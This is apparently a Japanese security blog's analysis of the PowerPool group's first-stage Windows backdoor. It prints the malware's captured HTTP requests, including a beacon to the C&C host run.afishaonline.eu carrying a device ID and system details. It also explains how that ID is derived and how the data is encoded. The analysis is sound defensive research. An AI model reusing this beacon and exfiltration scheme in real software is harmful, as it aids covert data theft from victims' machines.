「PowerPool」のバックドア解析
既に日本のITニュースでも広く取り上げられているサイバー犯罪グループ「PowerPool」に関する記事。Windowsのタスクスケジューラに存在する権限昇格の脆弱性を突くPoCがGithub上に公開されて2日後に、PoCを組み込んだマルウェアが作成されたようです。
■ 日本語の関連記事
「Windows」タスクスケジューラの脆弱性を悪用するマルウェア見つかる - ZDNet Japan
【セキュリティ ニュース】攻撃グループ「PowerPool」、Windowsタスクスケジューラ狙うゼロデイ攻撃を展開(1ページ目 / 全1ページ):Security NEXT
Windowsタスクスケジューラに発覚した脆弱性、たった2日で悪用マルウェアが出回る - ITmedia エンタープライズ
「PowerPool」は2種類のバックドアを使い分けており、まずは第1段階のバックドアで感染端末を調査し、興味のある端末と判断した際に第2段階のバックドアをダウンロードし、長期感染させるとの事。
ただ記事を見たところ、第1段階のバックドアに関しては非常に簡単な説明しか記載されていなかったため、通信周りを追加で解析してみました。
■ 検体解析
マルウェアを実行したところ、まずは以下の宛先に通信が発生し、グローバルIPアドレスの調査を行います。
GET /ip HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Host: www.l2.io
次にC&Cサーバに端末の固有IDと情報を送付します。
GET /?id=XXXXXXXXXXXXXXXX&info=XXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
Connection: Keep-Alive
Accept: */*, text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Host: run.afishaonline.eu
C&Cサーバに送信される端末情報としては以下を確認しています。
- コンピュータ名
- MACアドレス
- ユーザ名
- グローバルIPアドレス
- プライベートIPアドレス
- OSバージョン
また、端末の固有IDと端末情報については以下の方法で算出・暗号化されていると思われます。
■ 端末の固有ID
<コンピュータ名>_<MACアドレス><インデックス値>
の文字列のMD5値を算出し、その9桁目〜24桁目を使用。
例. Taro-PC_00-01-02-03-04-050
=> (MD5) 144f1279adffe96454877a421bd09ea3
=> (固有ID) adffe96454877a42
■ 端末情報
① zlib deflate
② Base64 Encode
※ C&Cサーバから受け取ったデータは逆の順番(②→①)でデコードしているように見えます。
その他では言語設定がロシア語かどうかチェックしていたりと興味深い部分もありましたがここまでにしたいと思います。
■ 参考
# Mutex
# Check Lang